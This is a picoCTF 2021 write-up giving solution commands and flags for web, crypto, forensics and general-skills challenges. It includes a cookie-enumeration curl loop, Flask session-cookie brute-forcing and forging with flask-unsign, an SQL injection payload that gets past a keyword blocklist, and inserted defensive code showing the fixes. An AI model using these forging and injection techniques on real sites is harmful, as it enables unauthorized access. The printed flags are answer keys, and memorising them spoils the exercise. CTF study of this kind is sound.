PicoCTF 2021

Introduction

General Skills

Obedient Cat

Downloading the flag file and opening it gives us the flag directly.

Python Wrangling

We need to download three files:

- ende.py  
- flag.txt.en  
- pw.txt

To solve it, just run the Python script as shown below:

#Run
python3 ende.py -d flag.txt.en

#Password
- The password is in pw.txt

Wave A Flag

Download the file; since it is a binary, follow the steps below:

#Steps
1. chmod +x warm
2. ./warm #We will see -h
3. ./warm -h #Get the flag

Nice Netcat ...

Connecting to the server with netcat gives us output like this:

112 in decimal is the ASCII character p, so we need to convert every number in the output to its character to get the flag. Let's do it as a one-liner :)

#Commands
for i in `nc mercury.picoctf.net 21135`; do printf \\$(printf "%o" $i);done;

Static ain't always noise

After downloading the files you can simply run strings on the static binary and grep for the flag, but the intended way is to run the bash script with the static file as its argument.

#Way 1
strings static | grep -i "pico"

#Way2
chmod +x static
chmod +x ltdis.sh
./ltdis.sh ./static
strings static.ltdis.* | grep -i "pico"

Tab, Tab, Attack

Downloading the files and unzipping them looks like this:

So let's recursively grep the flag format

grep -aRi "pico" .

Magikarp Ground Session

Make sure to click Launch Instance first

Let's connect via ssh first:

ssh ctf-player@venus.picoctf.net -p PORT

We need to find all 3 flags. These commands will help us:

#Find All Flags
find / -type f -name '*of3.flag.txt' 2>/dev/null

#Strings all Flags
for i in $(find / -type f -name '*of3.flag.txt' 2>/dev/null); do cat $i;done

Web Exploitation

Ancient History

Looking at the page source, there is a lot of JavaScript, much of it repeated. But the URL makes us curious why it shows ?p, and looking at the source code we found this:

Let's grep this with a regex and join the pieces into the flag:

1. copy all of the content in index.html to flag.txt
2. cat flag.txt | grep -oP "[^'](?=\'\))" | tr "\n" " " | sed -s 's/ //g'

GET aHEAD

Going into the page we will see this

Since it says HEAD, let's request only the document headers:

curl -I http://mercury.picoctf.net:PORT/index.php

Cookies

Playing with the site we found out that the name cookie can be manipulated to show different cookies. I love scripts >.<

for i in {0..30};do echo "Name="$i" ";curl -s -L http://mercury.picoctf.net:PORT/check --cookie "name=$i" | grep -oP  '(?<=<b>).*?(?=</b>)';done

Using name=18 gets us the flag:

curl -s -L http://mercury.picoctf.net:29649/check --cookie "name=18"

Scavenger Hunt

Opening the website we will see this

The first part we can get from the source code

The second part we can get in the css file

The third part we can get in /robots.txt

The fourth part we can get in .htaccess

The last part we can take a look at .DS_Store

#Flag
picoCTF{th4ts_4_l0t_0f_pl4c3s_2_lO0k_fa04427c}

Who are you?

Looking at the web page, we can see that we are required to use PicoBrowser.

Once we use the PicoBrowser user agent we hit another check: the page may only be accessed from a trusted website.

curl -A "PicoBrowser" http://mercury.picoctf.net:PORT/

We get past that too, but hit another problem: this site only works in 2018.

curl -A "PicoBrowser" -H "Referer: http://mercury.picoctf.net:46199/" -H "Date: Sun Nov  6 08:49:37 2018" http://mercury.picoctf.net:PORT/

Okay, another problem: we need to make sure we can't be tracked when accessing the page.

curl -A "PicoBrowser" -H "Referer: http://mercury.picoctf.net:46199/" -H "Date: Sun Nov  6 08:49:37 2018" -H "DNT: 1" http://mercury.picoctf.net:PORT/

Really... We need to solve another problem: this site is only for people from Sweden.

Some Assembly Required 1

It is my Birthday

To solve it we just need to provide two PDF files with the same MD5 hash value.

echo '4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa200a8284bf36e8e4b55b35f427593d849676da0d1555d8360fb5f07fea2' | xxd -r -p > 1.pdf
echo '4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa202a8284bf36e8e4b55b35f427593d849676da0d1d55d8360fb5f07fea2' | xxd -r -p > 2.pdf
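As an added check (not part of the writeup), the following script verifies that the two hex blobs above really are an MD5 collision: same MD5, different bytes, and a SHA-256 that tells them apart. It uses only the standard library and the blobs quoted above.

```python
# Added example, not the writeup's own command: confirm the MD5 collision
# of the two 64-byte blobs and show that SHA-256 distinguishes them.
import hashlib

# The two blobs quoted in the writeup (128 hex chars = 64 bytes each).
PDF_1_HEX = ("4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518"
             "afbfa200a8284bf36e8e4b55b35f427593d849676da0d1555d8360fb5f07fea2")
PDF_2_HEX = ("4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518"
             "afbfa202a8284bf36e8e4b55b35f427593d849676da0d1d55d8360fb5f07fea2")


def digest(data: bytes, algo: str) -> str:
    """Hex digest of `data` under the named hashlib algorithm."""
    return hashlib.new(algo, data).hexdigest()


def compare_pair(a_hex: str, b_hex: str) -> dict:
    """Report where two byte strings differ and whether MD5 / SHA-256 still agree."""
    a, b = bytes.fromhex(a_hex), bytes.fromhex(b_hex)
    return {
        "sizes": (len(a), len(b)),
        "identical": a == b,
        # byte offsets at which the two inputs differ
        "differing_offsets": [i for i, (x, y) in enumerate(zip(a, b)) if x != y],
        "md5_match": digest(a, "md5") == digest(b, "md5"),
        "sha256_match": digest(a, "sha256") == digest(b, "sha256"),
    }


if __name__ == "__main__":
    # Expected: not identical, two differing bytes, md5_match True, sha256_match False.
    for key, value in compare_pair(PDF_1_HEX, PDF_2_HEX).items():
        print(f"{key}: {value}")
```

The practical lesson for a defender is visible in the output: a service that deduplicates or checks integrity by MD5 alone (as the challenge does) will treat these two different files as the same, whereas a SHA-256 comparison does not.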

Some Assembly Required 2

Open the web page, set a breakpoint at line 34 and then inspect the WebAssembly.

At the end we see a possible flag.

Brute-forcing the XOR key gets us the flag:

picoCTF{15021d97ae0a401788600c815fb1caef}

Super Serial

Going into the web page we can see a login page.

Most Cookies

Looking at the page, it is almost the same as the previous challenge.

Entering snickerdoodle gives us a new session cookie; after base64-decoding it we see this:

The challenge description mentions Flask, and the file we download shows how the secret key is chosen:

cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]
app.secret_key = random.choice(cookie_names)

To get the flag we need to change the value of "very_auth" to admin.

#List Of Cookies
snickerdoodle
chocolate chip
oatmeal raisin
gingersnap
shortbread
peanut butter
whoopie pie
sugar
molasses
kiss
biscotti
butter
spritz
snowball
drop
thumbprint
pinwheel
wafer
macaroon
fortune
crinkle
icebox
gingerbread
tassie
lebkuchen
macaron
black and white
white chocolate macadamia

#Bruteforce unsign
#Install
python3 -m pip install flask-unsign 

#Bruteforce
flask-unsign --unsign --wordlist /opt/Word/rockyou.txt --cookie 'eyJ2ZXJ5X2F1dGgiOiJzbmlja2VyZG9vZGxlIn0.YFKkcA.K7FHGc9hV_qtRQEvnyJZgChNwtA' --no-literal-eval
- Found gingerbread

#Sign
flask-unsign --sign --cookie "{'very_auth': 'admin'}" --secret 'gingerbread'
- Get eyJ2ZXJ5X2F1dGgiOiJhZG1pbiJ9.YFKmZQ.t--tirgJeAXk8CMoA00b0VEz31A

Replace the session cookie with this value and we get the flag!
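To see why a 28-word secret_key is no protection at all, here is an added example (not the writeup's commands and not the challenge's server code) that re-implements how Flask signs its session cookie and runs the same candidate check flask-unsign performs, then contrasts it with a properly generated key. The cookie format (salt "cookie-session", HMAC-SHA1, MAC key derived as HMAC(secret, salt), three dot-separated base64url fields) is modelled on Flask/itsdangerous defaults and is an assumption of this example; the candidate list is the one quoted from the challenge source above.

```python
# Added example: Flask-style session signing, the weak-key audit check, and
# what the key should have been. Format details are assumptions modelled on
# Flask/itsdangerous defaults, not something the writeup states.
import base64
import hashlib
import hmac
import json
import secrets
import time

# Candidate secrets, as hard-coded in the challenge source quoted above.
COOKIE_NAMES = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]

SALT = b"cookie-session"  # Flask's default session salt


def _b64(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _signing_key(secret: str) -> bytes:
    # itsdangerous "hmac" key derivation: the MAC key is HMAC-SHA1(secret, salt)
    return hmac.new(secret.encode(), SALT, hashlib.sha1).digest()


def sign_session(data: dict, secret: str, timestamp=None) -> str:
    """Build a cookie of the form payload.timestamp.signature."""
    if timestamp is None:
        timestamp = int(time.time())
    payload = _b64(json.dumps(data, separators=(",", ":")).encode())
    ts = _b64(timestamp.to_bytes((timestamp.bit_length() + 7) // 8, "big"))
    signed_part = f"{payload}.{ts}"
    sig = hmac.new(_signing_key(secret), signed_part.encode(), hashlib.sha1).digest()
    return f"{signed_part}.{_b64(sig)}"


def verify_session(cookie: str, secret: str):
    """Return the session dict if the MAC checks out under `secret`, else None."""
    parts = cookie.split(".")
    if len(parts) != 3:
        return None
    payload, ts, sig = parts
    expected = hmac.new(_signing_key(secret), f"{payload}.{ts}".encode(), hashlib.sha1).digest()
    if not hmac.compare_digest(expected, _unb64(sig)):
        return None
    return json.loads(_unb64(payload))


def recover_weak_secret(cookie: str, candidates):
    """Audit check: does any entry of the hard-coded list validate this cookie?"""
    for candidate in candidates:
        if verify_session(cookie, candidate) is not None:
            return candidate
    return None


def strong_secret() -> str:
    """What app.secret_key should have been: 32 bytes from the OS CSPRNG."""
    return secrets.token_hex(32)


if __name__ == "__main__":
    # Constructed cookie: same session content as in the writeup, signed with "gingerbread"
    # and the timestamp that the writeup's cookie carries (0x6052A470 -> "YFKkcA").
    demo = sign_session({"very_auth": "snickerdoodle"}, "gingerbread", timestamp=0x6052A470)
    print("constructed cookie :", demo)
    print("weak key recovered :", recover_weak_secret(demo, COOKIE_NAMES))
    # The cookie quoted in the writeup; prints "gingerbread" when this
    # re-implementation matches Flask's real format byte for byte.
    writeup_cookie = "eyJ2ZXJ5X2F1dGgiOiJzbmlja2VyZG9vZGxlIn0.YFKkcA.K7FHGc9hV_qtRQEvnyJZgChNwtA"
    print("writeup cookie key :", recover_weak_secret(writeup_cookie, COOKIE_NAMES))
    # With a random secret the same list check finds nothing.
    hardened = sign_session({"very_auth": "admin"}, strong_secret())
    print("strong key recovered:", recover_weak_secret(hardened, COOKIE_NAMES))
```

The fix on the application side is the last function: a key drawn from a short, enumerable list is equivalent to no key, so the secret must come from a CSPRNG and be kept out of the source that players can download.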

Some Assembly Required 3

Set a breakpoint at line 34 and inspect the WebAssembly.

But we can't do the same thing here. So let's save the module as a .wasm file (webasm3.wasm below) and use wasm2c to convert it to C:

#Installing
git clone https://github.com/WebAssembly/wabt.git
cd wabt
make

#Commands
cd bin
./wasm2c webasm3.wasm -o webasm3.c

#What we can get
static const u8 data_segment_data_0[] = { // referring to i32.const 1024
  0x9d, 0x6e, 0x93, 0xc8, 0xb2, 0xb9, 0x41, 0x8b, 0x94, 0xc6, 0xdf, 0x33, 
  0xc0, 0xc5, 0x95, 0xde, 0x37, 0xc3, 0x9f, 0x93, 0xdf, 0x3f, 0xc9, 0xc3, 
  0xc2, 0x8c, 0x32, 0x93, 0x90, 0xc1, 0x8e, 0x65, 0x95, 0x9f, 0xc2, 0x8c, 
  0x36, 0xc8, 0x95, 0xc0, 0x90, 0x00, 0x00, 
};

static const u8 data_segment_data_1[] = { // referring to i32.const 106
  0xf1, 0xa7, 0xf0, 0x07, 0xed, 
};

Since we know the flag should start with picoCTF{, what we did is check how the byte 0x9d can become p (0x70).

It turns out the data is XORed from left to right with a repeating 5-byte key, which is data_segment_data_1 read backwards (0x9d ^ 0xed = 0x70 = p). Here is a simple script to recover the flag:

# Encrypted flag bytes: data_segment_data_0 from the wasm2c output
flag = [0x9d, 0x6e, 0x93, 0xc8, 0xb2, 0xb9, 0x41, 0x8b, 0x94, 0xc6, 0xdf, 0x33,
        0xc0, 0xc5, 0x95, 0xde, 0x37, 0xc3, 0x9f, 0x93, 0xdf, 0x3f, 0xc9, 0xc3,
        0xc2, 0x8c, 0x32, 0x93, 0x90, 0xc1, 0x8e, 0x65, 0x95, 0x9f, 0xc2, 0x8c,
        0x36, 0xc8, 0x95, 0xc0, 0x90, 0x00, 0x00]
# Key: data_segment_data_1 read back to front
key = [0xed, 0x07, 0xf0, 0xa7, 0xf1]
real_flag = ""
for index, i in enumerate(flag):
    if i == 0:  # the trailing 0x00 bytes are the C string terminator, not flag data
        break
    # the key repeats every 5 bytes, so index mod 5 selects the key byte
    real_flag += chr(i ^ key[index % len(key)])
print(real_flag)
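The writeup hard-codes the key after working out by hand that 0x9d must map to p. As an added example (not the writeup's script), the code below does that step programmatically for the general case: it derives the key bytes from the known prefix picoCTF{, checks that the prefix is long enough to confirm the key actually repeats, and only then decodes. It is run on the Some Assembly Required 3 data segment above and, to show the failure mode, on the Some Assembly Required 4 data segment quoted later on this page, which does not pass the consistency check for any short key length.

```python
# Added example, not the writeup's script: recover a repeating XOR key from a
# known plaintext prefix and verify it before decoding. Byte arrays are the
# data segments quoted in the writeup (SAR3 / SAR4 = Some Assembly Required 3 / 4).
SAR3_DATA = bytes([
    0x9d, 0x6e, 0x93, 0xc8, 0xb2, 0xb9, 0x41, 0x8b, 0x94, 0xc6, 0xdf, 0x33,
    0xc0, 0xc5, 0x95, 0xde, 0x37, 0xc3, 0x9f, 0x93, 0xdf, 0x3f, 0xc9, 0xc3,
    0xc2, 0x8c, 0x32, 0x93, 0x90, 0xc1, 0x8e, 0x65, 0x95, 0x9f, 0xc2, 0x8c,
    0x36, 0xc8, 0x95, 0xc0, 0x90, 0x00, 0x00,
])
SAR4_DATA = bytes([
    0x18, 0x6a, 0x7c, 0x61, 0x11, 0x38, 0x69, 0x37, 0x5b, 0x48, 0x7e, 0x4a,
    0x68, 0x5e, 0x4b, 0x6f, 0x1f, 0x5d, 0x5c, 0x77, 0x34, 0x6b, 0x50, 0x15,
    0x70, 0x4f, 0x3f, 0x5c, 0x45, 0x6f, 0x14, 0x06, 0x05, 0x7d, 0x3e, 0x3d,
    0x04, 0x16, 0x2e, 0x12, 0x4c, 0x00, 0x00,
])
KNOWN_PREFIX = b"picoCTF{"  # every picoCTF flag starts like this


def recover_key(ciphertext: bytes, known_prefix: bytes, key_len: int):
    """Derive key[i] = ct[i] ^ pt[i] over the known prefix.

    Returns None when a prefix byte past the first period disagrees with the
    byte derived one period earlier, i.e. the data is not a plain
    key_len-byte repeating XOR."""
    if len(known_prefix) <= key_len:
        raise ValueError("need a known prefix longer than the key to cross-check it")
    key = bytearray(key_len)
    for i, (c, p) in enumerate(zip(ciphertext, known_prefix)):
        k = c ^ p
        if i < key_len:
            key[i] = k
        elif key[i % key_len] != k:
            return None
    return bytes(key)


def xor_decode(ciphertext: bytes, key: bytes) -> str:
    """Apply the repeating key; trailing 0x00 bytes are the C terminator/padding."""
    data = ciphertext.rstrip(b"\x00")
    plain = bytes(c ^ key[i % len(key)] for i, c in enumerate(data))
    return plain.decode("ascii", "replace")


def decode_with_known_prefix(ciphertext: bytes, known_prefix: bytes = KNOWN_PREFIX,
                             max_key_len: int = 7):
    """Try key lengths 1..max_key_len; return (key, plaintext) for the first
    length that survives the cross-check, or None if none does."""
    for key_len in range(1, max_key_len + 1):
        key = recover_key(ciphertext, known_prefix, key_len)
        if key is not None:
            return key, xor_decode(ciphertext, key)
    return None


if __name__ == "__main__":
    # SAR3: recovers the 5-byte key (data_segment_data_1 reversed) and the flag.
    print("SAR3:", decode_with_known_prefix(SAR3_DATA))
    # SAR4: no short repeating key is consistent with the prefix, so nothing is decoded.
    print("SAR4:", decode_with_known_prefix(SAR4_DATA))
```

The cross-check is the part worth keeping: with an 8-byte known prefix and a 5-byte key, bytes 5 to 7 must reproduce key bytes 0 to 2, and when they do not the scheme is something other than repeating-key XOR, which is exactly what happens on the SAR4 bytes.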

Web Gauntlet 2

When we open the page we see a login page; entering guest:guest shows us the SQL query behind it.

#Filter
or and true false union like = > < ; -- /* */ admin

#Original
SELECT username, password FROM users WHERE username='$input' AND password='$input'

#Payload 
SELECT username, password FROM users WHERE username=''||'admi'||'n'||'' AND password='$input'
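To make the point concrete, here is an added example (not the challenge's own code) that runs the query above against an in-memory SQLite table: the string-formatted version behind the keyword blocklist lets the concatenation payload evaluate to admin, while the parameterized version compares the same input as a plain literal. The users table and the admin password constructed-pw-1 are constructed for this demo.

```python
# Added example, not the challenge's code: blocklist + string-built SQL
# (vulnerable) beside a parameterized query (fixed), on constructed data.
import sqlite3

# Filter list quoted in the writeup (matched as case-insensitive substrings here)
BLOCKLIST = ["or", "and", "true", "false", "union", "like",
             "=", ">", "<", ";", "--", "/*", "*/", "admin"]

# Payload from the writeup: '' || 'admi' || 'n' || '' evaluates to 'admin'
PAYLOAD = "'||'admi'||'n'||'"


def passes_blocklist(value: str) -> bool:
    """True when none of the blocked substrings occur in the input."""
    lowered = value.lower()
    return not any(word in lowered for word in BLOCKLIST)


def make_db() -> sqlite3.Connection:
    """Constructed users table; the admin password is made up for this demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "constructed-pw-1"), ("guest", "guest")])
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """The query shape from the writeup, with the inputs pasted in as text."""
    return ("SELECT username, password FROM users "
            f"WHERE username='{username}' AND password='{password}'")


def login_vulnerable(conn, username: str, password: str):
    """Blocklist first, then string-built SQL: the filter is the only defence."""
    if not (passes_blocklist(username) and passes_blocklist(password)):
        return None
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username: str, password: str):
    """Bound parameters: the input is compared as a literal, never parsed as SQL."""
    row = conn.execute(
        "SELECT username, password FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    print("blocklist lets payload through:", passes_blocklist(PAYLOAD))
    print("vulnerable query:", build_vulnerable_query(PAYLOAD, "constructed-pw-1"))
    print("vulnerable login ->", login_vulnerable(conn, PAYLOAD, "constructed-pw-1"))
    print("parameterized login ->", login_parameterized(conn, PAYLOAD, "constructed-pw-1"))
```

The blocklist blocks the word admin but not the || operator, so it cannot stop the input from being assembled into that word by the database itself; the parameterized query never gives the database a chance to interpret the input, which is the actual fix.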

Startup Company

Some Assembly Required 4

Save the WebAssembly we found and convert it using wasm2c.

#What we found
static const u8 data_segment_data_0[] = {
  0x18, 0x6a, 0x7c, 0x61, 0x11, 0x38, 0x69, 0x37, 0x5b, 0x48, 0x7e, 0x4a, 
  0x68, 0x5e, 0x4b, 0x6f, 0x1f, 0x5d, 0x5c, 0x77, 0x34, 0x6b, 0x50, 0x15, 
  0x70, 0x4f, 0x3f, 0x5c, 0x45, 0x6f, 0x14, 0x06, 0x05, 0x7d, 0x3e, 0x3d, 
  0x04, 0x16, 0x2e, 0x12, 0x4c, 0x00, 0x00, 
};

Cryptography

Mod 26

This challenge can easily be solved using CyberChef with the ROT13 recipe.

#Given
cvpbPGS{arkg_gvzr_V'yy_gel_2_ebhaqf_bs_ebg13_hyLicInt}

#ROT13
picoCTF{next_time_I'll_try_2_rounds_of_rot13_ulYvpVag}

Pixelated

We are given two PNG images. This challenge can be solved by combining both images using StegSolve!

#To Install
wget http://www.caesum.com/handbook/Stegsolve.jar -O stegsolve.jar

#Run
java -jar stegsolve.jar

Forensics

Information

Running exiftool on the image reveals the flag.

Weird File

Since this is a Word file with macros, we can open it and view the macro code.

#Commands
echo "cGljb0NURnttNGNyMHNfcl9kNG5nM3IwdXN9" | base64 -d

#Flag
picoCTF{m4cr0s_r_d4ng3r0us}

Matryoshka Doll

Unzip the files all the way and you will get the flag

picoCTF{4f11048e83ffc7d342a15bd2309b47de}

Reverse Engineering
